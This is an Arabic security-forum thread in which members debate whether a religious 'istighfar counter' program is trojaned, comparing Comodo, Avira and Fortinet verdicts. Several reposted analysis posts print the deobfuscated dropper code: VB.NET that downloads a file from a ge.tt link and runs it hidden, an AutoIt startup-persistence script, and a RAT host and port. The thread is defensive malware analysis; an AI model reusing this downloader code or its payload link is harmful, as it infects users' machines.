• [ يمنع ] طرح أي موضوع يحوي على كراكات أو باتشات او كيجنات من غير فحصها عبر موقع فيروس توتال [ virustotal.com ] وطرح رابط الفحص ضِمن الموضوع.

  • بادئ الموضوع بادئ الموضوع tarkanbounce
  • تاريخ البدء تاريخ البدء
  • المشاهدات 3,503
الحالة
مغلق و غير مفتوح للمزيد من الردود.
اخي هل هذا دليل اتصال

مشاهدة المرفق 42835

http://camas.comodo.com/cgi-bin/sub...cea3efbb764bce2814e49d1e83a8949786cdf488f3f0e

وما رايك في هذة النتيجة
http://valkyrie.comodo.com/Result.html?sha1=ec524914fe434d43b2bdee61ea1d7cd08e154568&&query=0&&filename=عداد الاستغفار والتوبة.exe

هل هي جازمة مع العلم ان من يقوم بفحص في هذا المختبر خبراء وليس هيروستك او ساندبوكس
بالنسبه لمسئله الاتصال فلا
الملف محمي من العمل علي مثل هذه المواقع لذلك لن تجد اي اتصال له الا بالتشغيل علي نظام حقيقي او تفك دمج الملف وتستخرج الاكواد

وبالنسبه للتقرير الثاني اتفق معه 100% ان الملف خبيث
 

بالنسبه لمسئله الاتصال فلا
الملف محمي من العمل علي مثل هذه المواقع لذلك لن تجد اي اتصال له الا بالتشغيل علي نظام حقيقي او تفك دمج الملف وتستخرج الاكواد

وبالنسبه للتقرير الثاني اتفق معه 100% ان الملف خبيث
ما هي افضل طريق لكشف مثل هذة البرمجيات هل التعلم الهندسة العكسية
 
الملف ملغم 100% بأحترافية تامة

على عكس ماقالت شركة افيرا ! ..

وجدت الملف في احدى المنتديات العربية المشهورة والموضوع في قسم المواضيع الملغمة ..

طبعاً لن اكتب اسم المنتدى لانه يعد اشهار وهذا يخالف قوانين زيزوم فأنت لو عرفت المنتدى هذاك فلا تقل اسمه بل احفظة لنفسك ..

UVmATU.png


بعدما قام اعضاء المنتدى العربي الاخر بتحليل الملف على طرقهم الخاصه بدلاً من الاعتماد على المختبرات

اكتشفوا ان الملف ملغم وهذه معلومات التلغيمة كاملة (ظاهرة للاعضاء فقط لحساسيتها)

-----
[hide]كود التلغيم كامل بعد فك الحمايه


كود:
Dim progressBar As ProgressBar = Me.vmethod_12()

  ' The following expression was wrapped in a checked-statement
  progressBar.Value += 1
  Dim left As String =  Conversions.ToString(Class1.smethod_0().Registry.GetValue(Conversions.ToString(Me.method_7("  #-17+=::-&<7=;-:4; " & vbTab & "" & vbCr & "4,  "  & vbTab & vbFormFeed & "%" & vbTab & "" & vbTab  & "" & vbCr & "4" & vbTab & "!,",  "hHHWeCYqvtugdOPQpZtIqbJ")), Conversions.ToString(Me.method_7("."";"  & vbLf & " ", "CpQqpBgruokIdeZPbVSSwYs")), Nothing))
  If Operators.ConditionalCompareObjectEqual(left, Me.method_7("@", "rMoDdHSUnRmqsUAhqkmIwIV"), False) Then
   Interaction.MsgBox(ChrW(1585) & ChrW(1581) & ChrW(1605) &  ChrW(1607) & " " & ChrW(1575) & ChrW(1604) & ChrW(1604)  & ChrW(1607) & " " & ChrW(1593) & ChrW(1604) &  ChrW(1609) & " " & ChrW(1575) & ChrW(1604) & ChrW(1576)  & ChrW(1578) & ChrW(1575) & ChrW(1585) & " " &  ChrW(1608) & ChrW(1575) & ChrW(1587) & ChrW(1603) &  ChrW(1606) & ChrW(1607) & " " & ChrW(1601) & ChrW(1589)  & ChrW(1610) & ChrW(1581) & " " & ChrW(1580) &  ChrW(1606) & ChrW(1575) & ChrW(1578) & ChrW(1607) & " "  & ChrW(1576) & ChrW(1571) & ChrW(1584) & ChrW(1606)  & " " & ChrW(1575) & ChrW(1604) & ChrW(1604) &  ChrW(1607), MsgBoxStyle.OkOnly, Nothing)
   Thread.Sleep(50000)
   Dim webClient As WebClient = New WebClient()
    webClient.DownloadFile("http://ge.tt/api/1/files/4skHE8K1/0/blob?download",   Conversions.ToString(Operators.ConcatenateObject(NewLateBinding.LateGet(Nothing,  GetType(Interaction), "Environ", New Object()() = {  RuntimeHelpers.GetObjectValue(Me.method_7("",  "rMoDdHSUnRmqsUAhqkmIwIV")) }, Nothing, Nothing, Nothing),  Me.method_7(String.Concat(New String()() = { "c",  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)), "b" & vbTab & "4)" }),  "LuAYoGbVmMcRskKhdgKSFEG"))))
    Interaction.****************l(Conversions.ToString(Operators.ConcatenateObject(NewLateBinding.LateGet(Nothing,  GetType(Interaction), "Environ", New Object()() = {  RuntimeHelpers.GetObjectValue(Me.method_7("",  "rMoDdHSUnRmqsUAhqkmIwIV")) }, Nothing, Nothing, Nothing),  Me.method_7(String.Concat(New String()() = { "c",  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)), "b" & vbTab & "4)" }),  "LuAYoGbVmMcRskKhdgKSFEG"))), AppWinStyle.MinimizedFocus, False, -1)
  End If
[/hide]
[hide]


رابط الداونلودر لكم

http://ge.tt/api/1/files/4skHE8K1/0/blob?download

[/hide]


[hide][/hide][hide]
السيرفر مدموج اوتوايت

بعد الفك اليكم السكربت


كود:
Sleep(50000)
If FileExists("C:\diskpt0.sys") Then
Exit
EndIf
FileInstall("      .Exe", @StartupDir & "\      .Exe")
Shutdown(10)

التلغيمه فيها شرط ان كان النظام مجمد فالتشغيلة لن تشتغل

وبعد تحقيق الشرط تعمل ريستارت وتثبت في الستآرت آب ثم تشتغل
السرفر نجرات وبرمجته دوت نت

النزول : C:\Users\Test\AppData\Local\Temp\Â Â Â Â Â Â .Exe

الهوست : g0ogle.myvnc.com

البورت : 5566

[/hide]

 
الملف ملغم 100% بأحترافية تامة

على عكس ماقالت شركة افيرا ! ..

وجدت الملف في احدى المنتديات العربية المشهورة والموضوع في قسم المواضيع الملغمة ..

طبعاً لن اكتب اسم المنتدى لانه يعد اشهار وهذا يخالف قوانين زيزوم فأنت لو عرفت المنتدى هذاك فلا تقل اسمه بل احفظة لنفسك ..

UVmATU.png


بعدما قام اعضاء المنتدى العربي الاخر بتحليل الملف على طرقهم الخاصه بدلاً من الاعتماد على المختبرات

اكتشفوا ان الملف ملغم وهذه معلومات التلغيمة كاملة (ظاهرة للاعضاء فقط لحساسيتها)

-----
[hide]كود التلغيم كامل بعد فك الحمايه

كود:
Dim progressBar As ProgressBar = Me.vmethod_12()

  ' The following expression was wrapped in a checked-statement
  progressBar.Value += 1
  Dim left As String =  Conversions.ToString(Class1.smethod_0().Registry.GetValue(Conversions.ToString(Me.method_7("  #-17+=::-&<7=;-:4; " & vbTab & "" & vbCr & "4,  "  & vbTab & vbFormFeed & "%" & vbTab & "" & vbTab  & "" & vbCr & "4" & vbTab & "!,",  "hHHWeCYqvtugdOPQpZtIqbJ")), Conversions.ToString(Me.method_7("."";"  & vbLf & " ", "CpQqpBgruokIdeZPbVSSwYs")), Nothing))
  If Operators.ConditionalCompareObjectEqual(left, Me.method_7("@", "rMoDdHSUnRmqsUAhqkmIwIV"), False) Then
   Interaction.MsgBox(ChrW(1585) & ChrW(1581) & ChrW(1605) &  ChrW(1607) & " " & ChrW(1575) & ChrW(1604) & ChrW(1604)  & ChrW(1607) & " " & ChrW(1593) & ChrW(1604) &  ChrW(1609) & " " & ChrW(1575) & ChrW(1604) & ChrW(1576)  & ChrW(1578) & ChrW(1575) & ChrW(1585) & " " &  ChrW(1608) & ChrW(1575) & ChrW(1587) & ChrW(1603) &  ChrW(1606) & ChrW(1607) & " " & ChrW(1601) & ChrW(1589)  & ChrW(1610) & ChrW(1581) & " " & ChrW(1580) &  ChrW(1606) & ChrW(1575) & ChrW(1578) & ChrW(1607) & " "  & ChrW(1576) & ChrW(1571) & ChrW(1584) & ChrW(1606)  & " " & ChrW(1575) & ChrW(1604) & ChrW(1604) &  ChrW(1607), MsgBoxStyle.OkOnly, Nothing)
   Thread.Sleep(50000)
   Dim webClient As WebClient = New WebClient()
    webClient.DownloadFile("http://ge.tt/api/1/files/4skHE8K1/0/blob?download",   Conversions.ToString(Operators.ConcatenateObject(NewLateBinding.LateGet(Nothing,  GetType(Interaction), "Environ", New Object()() = {  RuntimeHelpers.GetObjectValue(Me.method_7("",  "rMoDdHSUnRmqsUAhqkmIwIV")) }, Nothing, Nothing, Nothing),  Me.method_7(String.Concat(New String()() = { "c",  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)), "b" & vbTab & "4)" }),  "LuAYoGbVmMcRskKhdgKSFEG"))))
    Interaction.****************l(Conversions.ToString(Operators.ConcatenateObject(NewLateBinding.LateGet(Nothing,  GetType(Interaction), "Environ", New Object()() = {  RuntimeHelpers.GetObjectValue(Me.method_7("",  "rMoDdHSUnRmqsUAhqkmIwIV")) }, Nothing, Nothing, Nothing),  Me.method_7(String.Concat(New String()() = { "c",  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)), "b" & vbTab & "4)" }),  "LuAYoGbVmMcRskKhdgKSFEG"))), AppWinStyle.MinimizedFocus, False, -1)
  End If
[/hide]

[hide]

رابط الداونلودر لكم

http://ge.tt/api/1/files/4skHE8K1/0/blob?download

[/hide]

[hide][/hide][hide]
السيرفر مدموج اوتوايت

بعد الفك اليكم السكربت

كود:
Sleep(50000)
If FileExists("C:\diskpt0.sys") Then
Exit
EndIf
FileInstall("      .Exe", @StartupDir & "\      .Exe")
Shutdown(10)

التلغيمه فيها شرط ان كان النظام مجمد فالتشغيلة لن تشتغل

وبعد تحقيق الشرط تعمل ريستارت وتثبت في الستآرت آب ثم تشتغل
السرفر نجرات وبرمجته دوت نت

النزول : C:\Users\Test\AppData\Local\Temp\Â Â Â Â Â Â .Exe

الهوست : g0ogle.myvnc.com

البورت : 5566

[/hide]
مدهش :eek:
اذا كان الامر صحيحا فهي اول مره ارى فيها مثل هذا الخطأ الشنيع من مختبر الافيرا :confused:
جار تشغيل الملف للاحاطه بالتفاصيل + الارسال الى مختبر Fortinet كذلك ,
 
مدهش :eek:
اذا كان الامر صحيحا فهي اول مره ارى فيها مثل هذا الخطأ الشنيع من مختبر الافيرا :confused:
جار تشغيل الملف للاحاطه بالتفاصيل + الارسال الى مختبر Fortinet كذلك ,


للأسف الان تأكدت ان الحماية وحدها لاتنفع وانه يمكن لأي احد ان يخترع فايروس مدمر باحترافية وخداع المختبرات على الاقل لفترة بسيطة .. الحين انا شاك في جهازي تماما بعدما الكومودو فشل في رصد اي شيء مريب من اتصال او تعديل في الملفات !
 
للأسف الان تأكدت ان الحماية وحدها لاتنفع وانه يمكن لأي احد ان يخترع فايروس مدمر باحترافية وخداع المختبرات على الاقل لفترة بسيطة .. الحين انا شاك في جهازي تماما بعدما الكومودو فشل في رصد اي شيء مريب من اتصال او تعديل في الملفات !
اذا الكومودو مضبوط عندك على رصد الاتصال .. لا اعتقد سيفلت منه .. ربما الملف ملغم لكن فيه خلل ولا يعمل بالشكل الذي اراده الهكر
انا جربته على الوهمي لكن ممكن الملف لا يعمل على الوهمي
حاليا في انتظار رد مختبر fortinet
ولنر كيف ستنتهي القصه ..
 
ما هي افضل طريق لكشف مثل هذة البرمجيات هل التعلم الهندسة العكسية
باذن اخونا طارق للخروج عن الموضوع

طريقه كشف البرمجيات الخبيثه -مهما كانت -عن طريق التحليل وله اربعه صور

-static analysis (التحليل بدون تشغيل)
-dynamic analysis (التحليل بالتشغيل)
-network analysis(تحليل الشبكه والاتصالات)
-memory analysis (تحليل ذاكره الجهاز)

وكل نوع له مرحلتان

مرحله الاساسيات
ومرحله التحليل المتقدم

والهندسه العكسيه تمثل مرحله متقدمه من التحليل بدون تشغيل وبالتشغيل لذا من يجيدها فهو قادر علي عمل الكثير

هذه هي المنهجيه في التحليل والتي من خلالها تستطيع الكشف عن اي ملف خبيث مهما كان نوعه وتطوره
 
اذا الكومودو مضبوط عندك على رصد الاتصال .. لا اعتقد سيفلت منه .. ربما الملف ملغم لكن فيه خلل ولا يعمل بالشكل الذي اراده الهكر
انا جربته على الوهمي لكن ممكن الملف لا يعمل على الوهمي
حاليا في انتظار رد مختبر fortinet
ولنر كيف ستنتهي القصه ..


نسيت اقول ايضا اني ارسلت العينه الى مختبر fortinet

هذا ردهم وصل قبل قليل
Hi, We have received the file you have sent with md5 4FC752EF3A79B63BAE04F263D6C8C24D and have verified based on our initial quick analysis that it did not perform any noticeable Trojan/malware like behavior.
The file appears to be Arabic based applications/utility. The website it connects to appears to be religious related.
We will conduct further tests and analysis of its functions, once found malicious, a detection will be made available on our earliest possible Virus Signature update.
If you have any further concerns please do send us a mail and we will immediately assist you. Regards, AV Lab - ZaI To submit a suspicious file to Fortinet: http://www.fortinet.com/FortiGuardCenter/virus_scanner.html

حسب مافهمت انهم عملوا تحليل سريع للملف ولم يلاحظوا اي سلوك مريب يشبه سلوك المالوير او التروجان ولكنهم سيكملون التحليل بشكل اعمق للتأكد من الملف اكثر ..
 
نسيت اقول ايضا اني ارسلت العينه الى مختبر fortinet

هذا ردهم وصل قبل قليل


حسب مافهمت انهم عملوا تحليل سريع للملف ولم يلاحظوا اي سلوك مريب يشبه سلوك المالوير او التروجان ولكنهم سيكملون التحليل بشكل اعمق للتأكد من الملف اكثر ..

ماشاء الله تحليلات المختبر رائعه كالعاده ,, واضح انهم حللوا الملف بدقه بالغه .. تطبيق عربي و يتصل بموقع ديني !
يبدو ان الملف يحتوي على ما يدعو للشك فعلا .. لكن الملف لا يقوم بالفعل بأي سلوك خبيث يمكن رصده ,
ربما تلغيمه فاشله :unsure:
و لا اعتقد ان الملاحظات التي لاحظها الاخوه في ذلك المنتدى قد مرت عليهم دون الانتباه لها , لكن الملف بالفعل لا يقوم بأي سلوك خبيث :whistle:
لا اعرف رأيكم لكن .. انا بصراحه اثق في تحليل المختبرات اكثر من تحليل المنتديات
لان من يقومون بالتحليل هناك هم اهل الاختصاص و خبراء على مستوى العالم , و ليسوا هواه !!
 
ماشاء الله تحليلات المختبر رائعه كالعاده ,, واضح انهم حللوا الملف بدقه بالغه .. تطبيق عربي و يتصل بموقع ديني !
يبدو ان الملف يحتوي على ما يدعو للشك فعلا .. لكن الملف لا يقوم بالفعل بأي سلوك خبيث يمكن رصده ,
ربما تلغيمه فاشله :unsure:
و لا اعتقد ان الملاحظات التي لاحظها الاخوه في ذلك المنتدى قد مرت عليهم دون الانتباه لها , لكن الملف بالفعل لا يقوم بأي سلوك خبيث :whistle:
لا اعرف رأيكم لكن .. انا بصراحه اثق في تحليل المختبرات اكثر من تحليل المنتديات
لان من يقومون بالتحليل هناك هم اهل الاختصاص و خبراء على مستوى العالم , و ليسوا هواه !!
اخي الغالي لا يعني خبراء انهم اكتشف انة سليم ام خبيث مع العلم هذا التحليل من مختبر الكمودو من تحليل خبراء وتم كشفة على انه خبيث
http://valkyrie.comodo.com/Result.h...&query=0&&filename=عداد الاستغفار والتوبة.exe
 
الملف ملغم 100% بأحترافية تامة

على عكس ماقالت شركة افيرا ! ..

وجدت الملف في احدى المنتديات العربية المشهورة والموضوع في قسم المواضيع الملغمة ..

طبعاً لن اكتب اسم المنتدى لانه يعد اشهار وهذا يخالف قوانين زيزوم فأنت لو عرفت المنتدى هذاك فلا تقل اسمه بل احفظة لنفسك ..

UVmATU.png


بعدما قام اعضاء المنتدى العربي الاخر بتحليل الملف على طرقهم الخاصه بدلاً من الاعتماد على المختبرات

اكتشفوا ان الملف ملغم وهذه معلومات التلغيمة كاملة (ظاهرة للاعضاء فقط لحساسيتها)

-----
[hide]كود التلغيم كامل بعد فك الحمايه

كود:
Dim progressBar As ProgressBar = Me.vmethod_12()

  ' The following expression was wrapped in a checked-statement
  progressBar.Value += 1
  Dim left As String =  Conversions.ToString(Class1.smethod_0().Registry.GetValue(Conversions.ToString(Me.method_7("  #-17+=::-&<7=;-:4; " & vbTab & "" & vbCr & "4,  "  & vbTab & vbFormFeed & "%" & vbTab & "" & vbTab  & "" & vbCr & "4" & vbTab & "!,",  "hHHWeCYqvtugdOPQpZtIqbJ")), Conversions.ToString(Me.method_7("."";"  & vbLf & " ", "CpQqpBgruokIdeZPbVSSwYs")), Nothing))
  If Operators.ConditionalCompareObjectEqual(left, Me.method_7("@", "rMoDdHSUnRmqsUAhqkmIwIV"), False) Then
   Interaction.MsgBox(ChrW(1585) & ChrW(1581) & ChrW(1605) &  ChrW(1607) & " " & ChrW(1575) & ChrW(1604) & ChrW(1604)  & ChrW(1607) & " " & ChrW(1593) & ChrW(1604) &  ChrW(1609) & " " & ChrW(1575) & ChrW(1604) & ChrW(1576)  & ChrW(1578) & ChrW(1575) & ChrW(1585) & " " &  ChrW(1608) & ChrW(1575) & ChrW(1587) & ChrW(1603) &  ChrW(1606) & ChrW(1607) & " " & ChrW(1601) & ChrW(1589)  & ChrW(1610) & ChrW(1581) & " " & ChrW(1580) &  ChrW(1606) & ChrW(1575) & ChrW(1578) & ChrW(1607) & " "  & ChrW(1576) & ChrW(1571) & ChrW(1584) & ChrW(1606)  & " " & ChrW(1575) & ChrW(1604) & ChrW(1604) &  ChrW(1607), MsgBoxStyle.OkOnly, Nothing)
   Thread.Sleep(50000)
   Dim webClient As WebClient = New WebClient()
    webClient.DownloadFile("http://ge.tt/api/1/files/4skHE8K1/0/blob?download",   Conversions.ToString(Operators.ConcatenateObject(NewLateBinding.LateGet(Nothing,  GetType(Interaction), "Environ", New Object()() = {  RuntimeHelpers.GetObjectValue(Me.method_7("",  "rMoDdHSUnRmqsUAhqkmIwIV")) }, Nothing, Nothing, Nothing),  Me.method_7(String.Concat(New String()() = { "c",  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)), "b" & vbTab & "4)" }),  "LuAYoGbVmMcRskKhdgKSFEG"))))
    Interaction.****************l(Conversions.ToString(Operators.ConcatenateObject(NewLateBinding.LateGet(Nothing,  GetType(Interaction), "Environ", New Object()() = {  RuntimeHelpers.GetObjectValue(Me.method_7("",  "rMoDdHSUnRmqsUAhqkmIwIV")) }, Nothing, Nothing, Nothing),  Me.method_7(String.Concat(New String()() = { "c",  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)),  Conversions.ToString(Strings.Chr(236)), "b" & vbTab & "4)" }),  "LuAYoGbVmMcRskKhdgKSFEG"))), AppWinStyle.MinimizedFocus, False, -1)
  End If
[/hide]

[hide]

رابط الداونلودر لكم

http://ge.tt/api/1/files/4skHE8K1/0/blob?download

[/hide]

[hide][/hide][hide]
السيرفر مدموج اوتوايت

بعد الفك اليكم السكربت

كود:
Sleep(50000)
If FileExists("C:\diskpt0.sys") Then
Exit
EndIf
FileInstall("      .Exe", @StartupDir & "\      .Exe")
Shutdown(10)

التلغيمه فيها شرط ان كان النظام مجمد فالتشغيلة لن تشتغل

وبعد تحقيق الشرط تعمل ريستارت وتثبت في الستآرت آب ثم تشتغل
السرفر نجرات وبرمجته دوت نت

النزول : C:\Users\Test\AppData\Local\Temp\Â Â Â Â Â Â .Exe

الهوست : g0ogle.myvnc.com

البورت : 5566

[/hide]

الملف بالفعل فى هذا الموضوع وحبيت اشارك بكم وارائكم لانه ملف هام جداً واتضح لي ان الافيرا ولا شىء بعد ارساله للمختبرات :)
 
توقيع : tarkanbounce
اخي الغالي لا يعني خبراء انهم اكتشف انة سليم ام خبيث مع العلم هذا التحليل من مختبر الكمودو من تحليل خبراء وتم كشفة على انه خبيث
http://valkyrie.comodo.com/Result.html?sha1=ec524914fe434d43b2bdee61ea1d7cd08e154568&&query=0&&filename=عداد الاستغفار والتوبة.exe
اخي احمد , بصراحه تحليلات كومودو تحديدا غير واضحه و ضبابيه
عندما ارسل ملف للتحليل ارغب في رد واضح و قلة في الاكتشافات الخاطئة .. لذلك ابحث دائما عن المختبرات التي تتوفر فيها هذه الميزه ;)
 
حسب التحليل من المنتدى المجاور
Sleep(50000) If FileExists("C:\diskpt0.sys") Then Exit EndIf FileInstall(" .Exe", @StartupDir & "\ .Exe") Shutdown(10)

شاهدو هذا Sleep(50000) يعني تاخير التشغيل كما كان يفعل الاخ مصطفى في الباتش
 
ماشاء الله تحليلات المختبر رائعه كالعاده ,, واضح انهم حللوا الملف بدقه بالغه .. تطبيق عربي و يتصل بموقع ديني !
يبدو ان الملف يحتوي على ما يدعو للشك فعلا .. لكن الملف لا يقوم بالفعل بأي سلوك خبيث يمكن رصده ,
ربما تلغيمه فاشله :unsure:
و لا اعتقد ان الملاحظات التي لاحظها الاخوه في ذلك المنتدى قد مرت عليهم دون الانتباه لها , لكن الملف بالفعل لا يقوم بأي سلوك خبيث :whistle:
لا اعرف رأيكم لكن .. انا بصراحه اثق في تحليل المختبرات اكثر من تحليل المنتديات
لان من يقومون بالتحليل هناك هم اهل الاختصاص و خبراء على مستوى العالم , و ليسوا هواه !!

طيب شو رايك في مختبرات افيرا اخاف يكونوا هواه نفسنا :) ههههه
 
بالضبط (y) .. لكن من اين احضرت الملف ؟
هل قام التطبيق بتحميله :sneaky: , هذا هو السؤال على رأي شكسبير :D
بصراحة نحن ندور وندور والاجابة اتت من المنتدى المجاور على طبق من فضة:cool:ولو بقينا نحلل لن نصل الى ما وصلو الية :whistle:
+
الاتصال لتحميل الملف حسب سورس البرنامج معمول له تاخير :sneaky::ROFLMAO:
+
زائد خبيرنا الوحيد الدكتور فتحي اجزم انة ملف خبيث مع الدليل وكذالك مختبر الكمودو :p:love:

:love:
 
بصراحة نحن ندور وندور والاجابة اتت من المنتدى المجاور على طبق من فضة:cool:ولو بقينا نحلل لن نصل الى ما وصلو الية :whistle:
+
الاتصال لتحميل الملف حسب سورس البرنامج معمول له تاخير :sneaky::ROFLMAO:
+
زائد خبيرنا الوحيد الدكتور فتحي اجزم انة ملف خبيث مع الدليل وكذالك مختبر الكمودو :p:love:

:love:
الله اعلم طبعا و انا مجرد هاو في مجال الحمايه ,, و لا افقه في البرمجه و ما شابهها مثقال ذره
لكن ما زلت عند رأيي .. خبراء المختبرات العالميه هم الثقات في نظري ,, و اعطوا كل ذي حق حقه :rolleyes:
 
الله اعلم طبعا و انا مجرد هاو في مجال الحمايه ,, و لا افقه في البرمجه و ما شابهها مثقال ذره
لكن ما زلت عند رأيي .. خبراء المختبرات العالميه هم الثقات في نظري ,, و اعطوا كل ذي حق حقه :rolleyes:
كلامك صحيح لكن عندما ياتي لهم ملفات لتحليل من كل انحاء العالم هذا يقلل من مدى صحة هذة الاختبارات
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى